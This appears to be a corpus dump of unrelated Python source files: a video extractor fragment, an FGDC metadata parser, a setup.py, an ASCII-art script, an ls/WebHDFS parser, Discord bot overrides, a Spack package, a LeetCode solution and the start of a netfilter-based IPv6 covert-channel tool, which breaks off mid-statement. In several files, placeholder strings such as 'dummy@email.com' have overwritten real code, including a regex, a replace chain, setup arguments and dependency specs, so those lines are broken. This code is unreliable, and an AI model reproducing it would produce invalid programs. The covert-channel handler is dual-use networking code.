})\n formats.append(f)\n self._sort_formats(formats)\n\n subtitles = {}\n for cc in video_data.get(\'closedcaption\', {}).get(\'src\', []):\n cc_url = cc.get(\'value\')\n if not cc_url:\n continue\n ext = determine_ext(cc_url)\n if ext == \'xml\':\n ext = \'ttml\'\n subtitles.setdefault(cc.get(\'lang\'), []).append({\n \'url\': cc_url,\n \'ext\': ext,\n })\n\n thumbnails = []\n for thumbnail in video_data.get(\'thumbnails\', {}).get(\'thumbnail\', []):\n thumbnail_url = thumbnail.get(\'value\')\n if not thumbnail_url:\n continue\n thumbnails.append({\n \'url\': thumbnail_url,\n \'width\': int_or_none(thumbnail.get(\'width\')),\n \'height\': int_or_none(thumbnail.get(\'height\')),\n })\n\n return {\n \'id\': video_id,\n \'title\': title,\n \'description\': video_data.get(\'longdescription\') or video_data.get(\'description\'),\n \'duration\': int_or_none(video_data.get(\'duration\', {}).get(\'value\'), 1000),\n \'age_limit\': parse_age_limit(video_data.get(\'tvrating\', {}).get(\'rating\')),\n \'episode_number\': int_or_none(video_data.get(\'episodenumber\')),\n \'series\': video_data.get(\'show\', {}).get(\'title\'),\n \'season_number\': int_or_none(video_data.get(\'season\', {}).get(\'num\')),\n \'thumbnails\': thumbnails,\n \'formats\': formats,\n \'subtitles\': subtitles,\n }\n', '# -*- coding: ISO-8859-15 -*-\n# =============================================================================\n# Copyright (c) 2010 Tom Kralidis\n#\n# Authors : Tom Kralidis dummy@email.com\n#\n# Contact email: dummy@email.com\n# =============================================================================\n\n"""""" FGDC metadata parser """"""\n\nfrom __future__ import (absolute_import, division, print_function)\n\nfrom owscapable.etree import etree\nfrom owscapable import util\n\nclass Metadata(object):\n """""" Process metadata """"""\n def __init__(self, md):\n if hasattr(md, \'getroot\'): # standalone document\n self.xml = etree.tostring(md.getroot())\n else: # part of a larger document\n self.xml = etree.tostring(md)\n\n self.idinfo = Idinfo(md)\n self.eainfo = Eainfo(md)\n self.distinfo = Distinfo(md)\n self.metainfo = Metainfo(md)\n\n if self.idinfo.datasetid:\n self.identifier = self.idinfo.datasetid\n\nclass Idinfo(object):\n """""" Process idinfo """"""\n def __init__(self, md):\n val = md.find(\'idinfo/datasetid\')\n self.datasetid = util.testXMLValue(val)\n\n val = md.find(\'idinfo/citation\')\n self.citation = Citation(val)\n\n val = md.find(\'idinfo/descript\')\n if val is not None:\n self.descript = Descript(val)\n\n val = md.find(\'idinfo/timeperd\')\n self.timeperd = Timeperd(val)\n\n val = md.find(\'idinfo/status\')\n if val is not None:\n self.status = Status(val)\n\n val = md.find(\'idinfo/spdom\')\n if val is not None:\n self.spdom = Spdom(val)\n\n val = md.find(\'idinfo/keywords\')\n if val is not None:\n self.keywords = Keywords(val)\n\n val = md.find(\'idinfo/accconst\')\n self.accconst = util.testXMLValue(val)\n\n val = md.find(\'idinfo/useconst\')\n self.useconst = util.testXMLValue(val)\n\n val = md.find(\'idinfo/ptcontac\')\n if val is not None:\n self.ptcontac = Ptcontac(val)\n\n val = md.find(\'idinfo/datacred\')\n self.datacred = util.testXMLValue(val)\n\n val = md.find(\'idinfo/crossref\')\n self.crossref = Citation(val)\n\nclass Citation(object):\n """""" Process citation """"""\n def __init__(self, md):\n if md is not None:\n self.citeinfo = {}\n \n val = md.find(\'citeinfo/origin\')\n self.citeinfo[\'origin\'] = util.testXMLValue(val)\n \n val = 
md.find(\'citeinfo/pubdate\')\n self.citeinfo[\'pubdate\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/title\')\n self.citeinfo[\'title\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/geoform\')\n self.citeinfo[\'geoform\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/pubinfo/pubplace\')\n self.citeinfo[\'pubplace\'] = util.testXMLValue(val)\n \n val = md.find(\'citeinfo/pubinfo/publish\')\n self.citeinfo[\'publish\'] = util.testXMLValue(val)\n\n self.citeinfo[\'onlink\'] = []\n for link in md.findall(\'citeinfo/onlink\'):\n self.citeinfo[\'onlink\'].append(util.testXMLValue(link))\n\nclass Descript(object):\n """""" Process descript """"""\n def __init__(self, md):\n val = md.find(\'abstract\')\n self.abstract = util.testXMLValue(val)\n \n val = md.find(\'purpose\')\n self.purpose = util.testXMLValue(val)\n\n val = md.find(\'supplinf\')\n self.supplinf = util.testXMLValue(val)\n\nclass Timeperd(object):\n """""" Process timeperd """"""\n def __init__(self, md):\n if md is not None:\n val = md.find(\'current\')\n self.current = util.testXMLValue(val)\n\n val = md.find(\'timeinfo\')\n if val is not None:\n self.timeinfo = Timeinfo(val)\n\nclass Timeinfo(object):\n """""" Process timeinfo """"""\n def __init__(self, md):\n val = md.find(\'sngdate\')\n if val is not None:\n self.sngdate = Sngdate(val)\n\n val = md.find(\'rngdates\')\n if val is not None:\n self.rngdates = Rngdates(val)\n\nclass Sngdate(object):\n """""" Process sngdate """"""\n def __init__(self, md):\n val = md.find(\'caldate\')\n self.caldate = util.testXMLValue(val)\n val = md.find(\'time\')\n self.time = util.testXMLValue(val)\n\nclass Rngdates(object):\n """""" Process rngdates """"""\n def __init__(self, md):\n val = md.find(\'begdate\')\n self.begdate = util.testXMLValue(val)\n val = md.find(\'begtime\')\n self.begtime = util.testXMLValue(val)\n val = md.find(\'enddate\')\n self.enddate = util.testXMLValue(val)\n val = md.find(\'endtime\')\n self.endtime = util.testXMLValue(val)\n\nclass Status(object):\n """""" Process status """"""\n def __init__(self, md):\n val = md.find(\'progress\')\n self.progress = util.testXMLValue(val)\n\n val = md.find(\'update\')\n self.update = util.testXMLValue(val)\n\nclass Spdom(object):\n """""" Process spdom """"""\n def __init__(self, md):\n val = md.find(\'bounding/westbc\')\n self.westbc = util.testXMLValue(val)\n\n val = md.find(\'bounding/eastbc\')\n self.eastbc = util.testXMLValue(val)\n \n val = md.find(\'bounding/northbc\')\n self.northbc = util.testXMLValue(val)\n\n val = md.find(\'bounding/southbc\')\n self.southbc = util.testXMLValue(val)\n\n if (self.southbc is not None and self.northbc is not None and\n self.eastbc is not None and self.westbc is not None):\n self.bbox = Bbox(self)\n\nclass Bbox(object):\n """""" Generate bbox for spdom (convenience function) """"""\n def __init__(self, spdom):\n self.minx = spdom.westbc\n self.miny = spdom.southbc\n self.maxx = spdom.eastbc\n self.maxy = spdom.northbc\n\nclass Keywords(object):\n """""" Process keywords """"""\n def __init__(self, md):\n self.theme = []\n self.place = []\n self.temporal = []\n\n for i in md.findall(\'theme\'):\n theme = {}\n val = i.find(\'themekt\')\n theme[\'themekt\'] = util.testXMLValue(val)\n theme[\'themekey\'] = []\n for j in i.findall(\'themekey\'):\n themekey = util.testXMLValue(j)\n if themekey is not None:\n theme[\'themekey\'].append(themekey)\n self.theme.append(theme)\n\n for i in md.findall(\'place\'):\n theme = {}\n place = {}\n val = i.find(\'placekt\')\n 
theme[\'placekt\'] = util.testXMLValue(val)\n theme[\'placekey\'] = []\n for j in i.findall(\'placekey\'):\n theme[\'placekey\'].append(util.testXMLValue(j))\n self.place.append(place)\n\n for i in md.findall(\'temporal\'):\n theme = {}\n temporal = {}\n val = i.find(\'tempkt\')\n theme[\'tempkt\'] = util.testXMLValue(val)\n theme[\'tempkey\'] = []\n for j in i.findall(\'tempkey\'):\n theme[\'tempkey\'].append(util.testXMLValue(j))\n self.temporal.append(temporal)\n\nclass Ptcontac(object):\n """""" Process ptcontac """"""\n def __init__(self, md):\n val = md.find(\'cntinfo/cntorgp/cntorg\')\n self.cntorg = util.testXMLValue(val) \n\n val = md.find(\'cntinfo/cntorgp/cntper\')\n self.cntper = util.testXMLValue(val) \n\n val = md.find(\'cntinfo/cntpos\')\n self.cntpos = util.testXMLValue(val) \n\n val = md.find(\'cntinfo/cntaddr/addrtype\')\n self.addrtype = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/address\')\n self.address = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/city\')\n self.city = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/state\')\n self.state = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/postal\')\n self.postal = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntaddr/country\')\n self.country = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntvoice\')\n self.voice = util.testXMLValue(val)\n\n val = md.find(\'cntinfo/cntemail\')\n self.email = util.testXMLValue(val)\n\nclass Eainfo(object):\n """""" Process eainfo """"""\n def __init__(self, md):\n val = md.find(\'eainfo/detailed/enttyp/enttypl\')\n self.enttypl = util.testXMLValue(val)\n\n val = md.find(\'eainfo/detailed/enttyp/enttypd\')\n self.enttypd = util.testXMLValue(val)\n\n val = md.find(\'eainfo/detailed/enttyp/enttypds\')\n self.enttypds = util.testXMLValue(val)\n\n self.attr = []\n for i in md.findall(\'eainfo/detailed/attr\'):\n attr = {}\n val = i.find(\'attrlabl\')\n attr[\'attrlabl\'] = util.testXMLValue(val)\n\n val = i.find(\'attrdef\')\n attr[\'attrdef\'] = util.testXMLValue(val)\n\n val = i.find(\'attrdefs\')\n attr[\'attrdefs\'] = util.testXMLValue(val)\n\n val = i.find(\'attrdomv/udom\')\n attr[\'udom\'] = util.testXMLValue(val)\n\n self.attr.append(attr)\n\nclass Distinfo(object):\n """""" Process distinfo """"""\n def __init__(self, md):\n val = md.find(\'distinfo\')\n if val is not None:\n val2 = val.find(\'stdorder\')\n if val2 is not None:\n self.stdorder = {\'digform\': []}\n for link in val2.findall(\'digform\'):\n digform = {}\n digform[\'name\'] = util.testXMLValue(link.find(\'digtinfo/formname\'))\n digform[\'url\'] = util.testXMLValue(link.find(\'digtopt/onlinopt/computer/networka/networkr/\'))\n self.stdorder[\'digform\'].append(digform)\n\nclass Metainfo(object):\n """""" Process metainfo """"""\n def __init__(self, md):\n val = md.find(\'metainfo/metd\')\n self.metd = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metrd\')\n self.metrd = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metc\') \n if val is not None:\n self.metc = Ptcontac(val)\n\n val = md.find(\'metainfo/metstdn\')\n self.metstdn = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metstdv\')\n self.metstdv = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metac\')\n self.metac = util.testXMLValue(val)\n\n val = md.find(\'metainfo/metuc\')\n self.metuc = util.testXMLValue(val)\n', 'import sys\nfrom setuptools import setup\n\ntests_require = [""nose>=1.0""]\nif sys.version_info < (3,0):\n tests_require = [""nose>=1.0"", ""mock""]\n\nsetup(\n 
name=""unitils"",\n version=""0.1.2"",\n author=""iLoveTux"",\n dummy@email.com"",\n description=""Cross platform utilities I have found to be incredibly useful"",\n license=""GPLv3"",\n keywords=""utility tools cli"",\n url=""http://github.com/ilovetux/unitils"",\n packages=[\'unitils\'],\n install_requires=[""colorama""],\n entry_points={\n ""console_scripts"": [\n ""cat.py=unitils.cli:cat"",\n ""cp.py=unitils.cli:cp"",\n ""find.py=unitils.cli:find"",\n ""grep.py=unitils.cli:grep"",\n ""head.py=unitils.cli:head"",\n ""ls.py=unitils.cli:ls"",\n ""mv.py=unitils.cli:mv"",\n ""watch.py=unitils.cli:watch"",\n ""wc.py=unitils.cli:wc"",\n ""which.py=unitils.cli:which"",\n ]\n },\n test_suite=""nose.collector"",\n tests_require=tests_require,\n classifiers=[\n ""Development Status :: 4 - Beta"",\n ""Topic :: Utilities"",\n ""License :: OSI Approved :: GNU General Public License v3 (GPLv3)"",\n ],\n)\n', '#!/usr/bin/env python\n\n# asciinator.py\n# \n# Copyright 2014 Christian Diener dummy@email.com\n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nfrom __future__ import print_function\t\t# for python2 compat\n\nimport sys; \nfrom PIL import Image; \nimport numpy as np\n\n# ascii chars sorted by ""density""\nchars = np.asarray(list(\' .,:;irsXA253hMHGS#9B&@\'))\n\n# check command line arguments\nif len(sys.argv) != 4: \n\tprint( \'Usage: asciinator.py image scale factor\' )\n\tsys.exit()\n\n# set basic program parameters \n# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor\t\nf, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0\n\n# open, scale and normalize image by pixel intensities\nimg = Image.open(f)\nS = (int(img.size[0]*SC*WCF), int(img.size[1]*SC))\nimg = np.sum( np.asarray(img.resize(S), dtype=""float""), axis=2)\nimg -= img.min()\nimg = (1.0 - img/img.max())**GCF*(chars.size-1)\n\n# Assemble and print ascii art\nprint( ""\\n"".join(("""".join(r) for r in chars[img.astype(int)])))\nprint()\n', '#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport datetime\nfrom time import strptime\nimport re\nimport os\nimport json\n\nclass FileStatus(object):\n def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):\n self.path = path\n\n self.rights = rights\n self.nbFiles = nbFiles\n self.owner = owner\n self.group = group\n\n self.size = size\n\n self.date = date\n self.relpath = relpath\n\n def __eq__(self, other):\n return (self.path == other.path and self.rights == other.rights and\n self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and\n self.size == other.size and self.date == other.date)\n\n def is_dir(self):\n return self.rights.startswith(""d"")\n\n def __str__(self):\n return self.to_str(0, 0, 0, 0, 0, 0, 0)\n\n def to_str(self, rights_width, nbFiles_width, owner_width, group_width, 
size_width, date_width, path_width):\n        if self.is_dir():\n            nb_files = ""-""\n        else:\n            nb_files = str(self.nbFiles)\n        result = ""%s %s %s %s %s %s %s"" % (self.rights.ljust(rights_width),\n                                           nb_files.ljust(nbFiles_width),\n                                           self.owner.ljust(owner_width),\n                                           self.group.ljust(group_width),\n                                           str(self.size).ljust(size_width),\n                                           self.date.strftime(""%Y-%m-%d %H:%M"").ljust(date_width),\n                                           self.path.ljust(path_width))\n        return result.encode(""utf-8"")\n\ndef get_file_statuses_pretty_print(file_statuses):\n    rights_width = 0\n    nb_files_width = 0\n    owner_width = 0\n    group_width = 0\n    size_width = 0\n    date_width = 0\n    path_width = 0\n\n    if len(file_statuses) != 0:\n        rights_width = max([len(fs.rights) for fs in file_statuses])\n        nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])\n        owner_width = max([len(fs.owner) for fs in file_statuses])\n        group_width = max([len(fs.group) for fs in file_statuses])\n        size_width = max([len(str(fs.size)) for fs in file_statuses])\n        date_width = max([len(fs.date.strftime(""%Y-%m-%d %H:%M"")) for fs in file_statuses])\n        path_width = max([len(fs.path) for fs in file_statuses])\n\n    result = []\n    for file_status in file_statuses:\n        result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))\n    return ""\\n"".join(result)\n\nclass LsParser(object):\n    def __init__(self):\n        pass\n\n    def parse_line(self, line):\n        regex = ""^(dummy@email.com)$""\n\n        m = re.match(regex, line, re.UNICODE)\n        if m is None:\n            return None\n\n        rights = m.group(1)\n        nbFiles = int(m.group(2))\n        owner = m.group(3)\n        group = m.group(4)\n        size = int(m.group(5))\n\n        day = int(m.group(6))\n        month = m.group(7)\n        try:\n            month = strptime(month, \'%b\').tm_mon\n        except ValueError:\n            month = [u""jan"", u""fév"", u""mar"", u""avr"", u""mai"", u""jui"", u""juil"", u""aoû"", u""sep"", u""oct"", u""nov"", u""déc""].index(month) + 1\n\n        try:\n            year = int(m.group(8))\n        except (TypeError, ValueError):\n            year = datetime.datetime.now().year\n        filename = m.group(9)\n\n        date = datetime.date(year, month, day)\n\n        return FileStatus(filename, rights, nbFiles, owner, group, size, date)\n\n    def parse(self, output):\n        result = [self.parse_line(line) for line in output.split(""\\n"")]\n        return [p for p in result if p is not None]\n\nclass WebHdfsParser(object):\n    def __init__(self, path):\n        self.path = path\n\n    def permissions_to_unix_name(self, is_dir, rights):\n        is_dir_prefix = \'d\' if is_dir else \'-\'\n        sticky = False\n        if len(rights) == 4 and rights[0] == \'1\':\n            sticky = True\n            rights = rights[1:]\n        dic = {\'7\': \'rwx\', \'6\': \'rw-\', \'5\': \'r-x\', \'4\': \'r--\', \'3\': \'-wx\', \'2\': \'-w-\', \'1\': \'--x\', \'0\': \'---\'}\n        result = is_dir_prefix + \'\'.join(dic[x] for x in rights)\n        if sticky:\n            result = result[:-1] + ""t""\n        return result\n\n    def parse_status(self, status):\n        relpath = status[""pathSuffix""]\n        path = os.path.join(self.path, relpath)\n        nbFiles = 0\n        size = status[""length""]\n        owner = status[""owner""]\n        group = status[""group""]\n        is_dir = status[""type""] == ""DIRECTORY""\n        right_digits = status[""permission""]\n        rights = self.permissions_to_unix_name(is_dir, right_digits)\n\n        parsed_date = datetime.datetime.utcfromtimestamp(int(status[""modificationTime""])/1000)\n\n        date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)\n\n        return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)\n\n\n    def parse(self, output):\n\ttry:\n            j = json.loads(output)\n\texcept ValueError:\n\t print
output\t\n\t return []\t\n if ""FileStatuses"" not in j or ""FileStatus"" not in j[""FileStatuses""]:\n print j\n return []\n statuses = j[""FileStatuses""][""FileStatus""]\n result = []\n for status in statuses:\n result.append(self.parse_status(status))\n return result\n', '# coding=utf-8\n""""""Overrides for Discord.py classes""""""\nimport contextlib\nimport inspect\nimport io\nimport itertools\nimport re\n\nimport discord\nfrom discord.ext.commands import HelpFormatter as HelpF, Paginator, Command\nfrom bot.utils import polr, privatebin\n\nfrom bot.utils.args import ArgParseConverter as ArgPC\n\n\ndef create_help(cmd, parser):\n """"""Creates an updated usage for the help command""""""\n default = cmd.params[\'args\'].default\n if cmd.signature.split(""["")[-1] == f""args={default}]"" if default else ""args]"":\n sio = io.StringIO()\n with contextlib.redirect_stdout(sio):\n parser.print_help()\n sio.seek(0)\n s = sio.read()\n # Strip the filename and trailing newline from help text\n arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]\n k = cmd.qualified_name\n spt = len(k.split())\n # Remove a duplicate command name + leading arguments\n split_sig = cmd.signature.split()[spt:]\n return ""["".join(("" "".join(split_sig)).split(""["")[:-1]) + arg_part\n return cmd.usage\n\n\nclass HelpFormatter(HelpF):\n """"""Custom override for the default help command""""""\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._paginator = None\n\n async def format(self):\n """"""Handles the actual behaviour involved with formatting.\n\n To change the behaviour, this method should be overridden.\n\n Returns\n --------\n list\n A paginated output of the help command.\n """"""\n self._paginator = Paginator()\n\n # we need a padding of ~80 or so\n\n description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)\n\n if description:\n # portion\n self._paginator.add_line(description, empty=True)\n\n if isinstance(self.command, Command):\n # \n if self.command.params.get(""args"", None) and type(self.command.params[\'args\'].annotation) == ArgPC:\n self.command.usage = create_help(self.command, self.command.params[\'args\'].annotation.parser)\n signature = self.get_command_signature()\n self._paginator.add_line(signature, empty=True)\n\n # section\n if self.command.help:\n self._paginator.add_line(self.command.help, empty=True)\n\n # end it here if it\'s just a regular command\n if not self.has_subcommands():\n self._paginator.close_page()\n return self._paginator.pages\n\n max_width = self.max_name_size\n\n def category(tup):\n """"""Splits the help command into categories for easier readability""""""\n cog = tup[1].cog_name\n # we insert the zero width space there to give it approximate\n # last place sorting position.\n return cog + \':\' if cog is not None else \'\\u200bNo Category:\'\n\n filtered = await self.filter_command_list()\n if self.is_bot():\n data = sorted(filtered, key=category)\n for category, commands in itertools.groupby(data, key=category):\n # there simply is no prettier way of doing this.\n commands = sorted(commands)\n if len(commands) > 0:\n self._paginator.add_line(category)\n\n self._add_subcommands_to_page(max_width, commands)\n else:\n filtered = sorted(filtered)\n if filtered:\n self._paginator.add_line(\'Commands:\')\n self._add_subcommands_to_page(max_width, filtered)\n\n # add the ending note\n self._paginator.add_line()\n ending_note = self.get_ending_note()\n self._paginator.add_line(ending_note)\n return 
self._paginator.pages\n\n\n_mentions_transforms = {\n \'@everyone\': \'@\\u200beveryone\',\n \'@here\': \'@\\u200bhere\'\n}\n\n_mention_pattern = re.compile(\'|\'.join(_mentions_transforms.keys()))\n\n\ndef _is_submodule(parent, child):\n return parent == child or child.startswith(parent + ""."")\n\n\nasync def _default_help_command(ctx, *commands: str):\n """"""Shows this message.""""""\n bot = ctx.bot\n destination = ctx.message.author if bot.pm_help else ctx.message.channel\n\n def repl(obj):\n return _mentions_transforms.get(obj.group(0), \'\')\n\n # help by itself just lists our own commands.\n if len(commands) == 0:\n pages = await bot.formatter.format_help_for(ctx, bot)\n elif len(commands) == 1:\n # try to see if it is a cog name\n name = _mention_pattern.sub(repl, commands[0])\n command = None\n if name in bot.cogs:\n command = bot.cogs[name]\n else:\n command = bot.all_commands.get(name)\n if command is None:\n await destination.send(bot.command_not_found.format(name))\n return\n\n pages = await bot.formatter.format_help_for(ctx, command)\n else:\n name = _mention_pattern.sub(repl, commands[0])\n command = bot.all_commands.get(name)\n if command is None:\n await destination.send(bot.command_not_found.format(name))\n return\n\n for key in commands[1:]:\n try:\n key = _mention_pattern.sub(repl, key)\n command = command.all_commands.get(key)\n if command is None:\n await destination.send(bot.command_not_found.format(key))\n return\n except AttributeError:\n await destination.send(bot.command_has_no_subcommands.format(command, key))\n return\n\n pages = await bot.formatter.format_help_for(ctx, command)\n\n if bot.pm_help is None:\n characters = sum(map(len, pages))\n # modify destination based on length of pages.\n if characters > 1000:\n destination = ctx.message.author\n\n for page in pages:\n try:\n await destination.send(page)\n except discord.Forbidden:\n destination = ctx.message.channel\n await destination.send(page)\n\n\nold_send = discord.abc.Messageable.send\n\n\nasync def send(self, content=None, **kwargs):\n """"""Overrides default send method in order to create a paste if the response is more than 2000 characters""""""\n if content is not None and any(x in str(content) for x in [""@everyone"", ""@here""]):\n content = content.replace(""@everyone"", dummy@email.com(""@here"", ""@h\\u0435re"")\n if content is not None and len(str(content)) > 2000:\n if content.startswith(""```py""):\n content = ""\\n"".join(content.split(""\\n"")[1:-1])\n paste = await privatebin.upload(content, expires=""15min"", server=self.bot.priv)\n if self.bot.polr:\n paste = await polr.shorten(paste, **self.bot.polr)\n return await old_send(self, f""Hey, I couldn\'t handle all the text I was gonna send you, so I put it in a paste!""\n f""\\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!"",\n **kwargs)\n else:\n return await old_send(self, content, **kwargs)\n', '##############################################################################\n# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n#\n# This file is part of Spack.\n# Created by Todd Gamblin, dummy@email.com, All rights reserved.\n# LLNL-CODE-647188\n#\n# For details, see https://github.com/llnl/spack\n# Please also see the NOTICE and LICENSE files for our notice and the LGPL.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License (as\n# published by the 
Free Software Foundation) version 2.1, February 1999.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and\n# conditions of the GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n##############################################################################\nfrom spack import *\n\n\nclass RLimma(RPackage):\n """"""Data analysis, linear models and differential expression\n for microarray data.""""""\n\n homepage = ""https://www.bioconductor.org/packages/limma/""\n url = ""https://git.bioconductor.org/packages/limma""\n list_url = homepage\n\n version(\'3.32.10\', git=\'https://git.bioconductor.org/packages/limma\', commit=\'PI:KEY\')\n version(\'3.32.6\', \'PI:KEY\')\n\n depends_on(dummy@email.com\', dummy@email.com\')\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\'\'\'\n*****************************************\nAuthor: zhlinh\nEmail: dummy@email.com\nVersion: 0.0.1\nCreated Time: 2016-03-11\nLast_modify: 2016-03-11\n******************************************\n\'\'\'\n\n\'\'\'\nGiven a 2D board containing \'X\' and \'O\',\ncapture all regions surrounded by \'X\'.\n\nA region is captured by flipping all \'O\'s\ninto \'X\'s in that surrounded region.\n\nFor example,\nX X X X\nX O O X\nX X O X\nX O X X\nAfter running your function, the board should be:\n\nX X X X\nX X X X\nX X X X\nX O X X\n\'\'\'\n\nclass Solution(object):\n def solve(self, board):\n """"""\n :type board: List[List[str]]\n :rtype: void Do not return anything, modify board in-place instead.\n """"""\n m = len(board)\n if m < 2:\n return\n n = len(board[0])\n for i in range(m):\n self.helper(board, i, 0, m, n)\n if n > 1:\n self.helper(board, i, n - 1, m, n)\n for j in range(n):\n self.helper(board, 0, j, m, n)\n if m > 1:\n self.helper(board, m - 1, j, m, n)\n for i in range(m):\n for j in range(n):\n if board[i][j] == \'O\':\n board[i][j] = \'X\'\n if board[i][j] == \'1\':\n board[i][j] = \'O\'\n\n def helper(self, board, i, j, m, n):\n if board[i][j] == \'O\':\n board[i][j] = \'1\'\n # trick here, normally it could be i >= 1.\n # but the boardary will alays get checked.\n # so i == 1, then check 0 is duplicated.\n if i > 1:\n self.helper(board, i - 1, j, m, n)\n if i < m - 2:\n self.helper(board, i + 1, j, m, n)\n if j > 1:\n self.helper(board, i, j - 1, m, n)\n if j < n - 2:\n self.helper(board, i, j + 1, m, n)\n', ""#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n## This file is part of ccsocket\n## Copyright (C) Tomas Dragoun dummy@email.com\n## This program is published under a GPLv3 license\n########################################################\n\n\nimport nfqueue\nimport sys\nimport signal\nfrom multiprocessing import Process, Pipe, Lock\nfrom socket import AF_INET6\nfrom scapy.all import * \nfrom scapy.layers.inet6 import ICMPv6Unknown\nfrom headers import IPv6ExtHdrAH\nfrom constants import Constants\n\n############################\n## ##\n## NFQHandler ##\n## ##\n############################\n\nclass NFQHandler(Process):\n#---------------------------------------------------------------------------------- \n '''\n This class handles netfilter queue. Is connected with a parent process \n via pipe. 
Messages are decoded and removed from incoming packets, and the data\n    are sent to the parent through the pipe. In passive mode the queue\n    intercepts both incoming and outgoing traffic. Inherits\n    multiprocessing.Process.\n    '''\n#---------------------------------------------------------------------------------- \n    def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):\n        ''' Call parent's constructor first '''\n        Process.__init__(self) # init parent (multiprocessing.Process)\n        self.name = 'NFQHandler-port ' + str(address[1])\n        self.daemon = True # set process daemonic\n        ''' Initialize class attributes '''\n        self._const = Constants()\n        self._encoder = encoder # encodes message in packet\n        self._pipe = pipe # exchange data with parent process via pipe\n        self._can_send = sendevt # event shared with parent process\n        self._stop_send = stopevt # event shared with parent process\n        self._proto = proto # upper-layer protocol\n        self._active = active # mode\n        self._host = address[0]\n        self._port = address[1]\n        '''\n        The following steps prepare a netfilter queue with _port as the\n        queue number. There is always only one active queue associated\n        with a given number.\n        '''\n        self._queue = nfqueue.queue() # create queue\n        self._queue.open() # open queue\n        try:\n            self._queue.bind(AF_INET6) # set family type AF_INET6\n        except: # fails when any other queue already runs\n            pass\n        self._queue.set_callback(self.handlepacket) # set queue callback\n        '''\n        The final step raises RuntimeError in case there is some other\n        queue with the same number active, the queue wasn't closed\n        properly, or the user's privileges are insufficient.\n        '''\n        self._queue.create_queue(self._port)\n#---------------------------------------------------------------------------------- \n    def __del__(self):\n        if self._pipe: # close connection with parent process\n            self._pipe.close()\n#---------------------------------------------------------------------------------- \n    def destroyqueue(self):\n        ''' Attempts to close queue '''\n        if self._queue:\n            #print 'stopping queue ' + str(self._port)\n            self._queue.close() # close queue\n            self._queue = None\n#----------------------------------------------------------------------------------\n    def _clear(self):\n        ''' Removes all data to send from pipe and sets state to idle '''\n        while self._pipe.poll(): # clear pipe\n            self._pipe.recv()\n        self._can_send.set()\n        self._stop_send.clear()\n#---------------------------------------------------------------------------------- \n    def run(self):\n        '''\n        Runs an endless loop. Every time a packet appears in the queue,\n        the handlepacket callback is invoked.\n        '''\n        #print 'starting queue ' + str(self._port)\n        self._queue.try_run()\n#---------------------------------------------------------------------------------- \n    def handlepacket(self, number, payload):\n        ''' Queue callback function '''\n        packet = IPv6(payload.get_data()) # decode packet from queue as IPv6\n        '''\n        Check if packet belongs to this queue - the upper-layer ID field\n        must match in active mode.\n        '''\n        modify, reroute = self._checkport(packet)\n        if not modify:\n            '''\n            Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit\n            number.
Lower 16 bits code this verdict and upper 16 bits \n are used to identify target queue.\n '''\n if reroute != -1:\n error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))\n if not error:\n return\n ''' \n Packet doesn't have icmp echo layer or target port isn't active, \n accept packet \n '''\n payload.set_verdict(nfqueue.NF_ACCEPT) \n return\n ''' \n Port is ok, we need to check if address matches. Ip6tables rules filter\n addresses, but packet might have been rerouted from other queue.\n '''\n if len(self._host): # check source/destination address\n if packet.src != self._host and packet.dst != self._host:\n payload.set_verdict(nfqueue.NF_ACCEPT) \n return\n ''' \n Nfqueue mark is used to distinguish between incoming and outgoing \n packets. Each packet is marked. \n '''\n mark = payload.get_nfmark() # get mark of this packet \n if mark == 1: # incoming packet\n self._incoming(packet, payload)\n elif mark == 2: # outgoing packet\n self._outgoing(packet, payload)\n#---------------------------------------------------------------------------------- \n def _incoming(self, packet, payload): \n message = 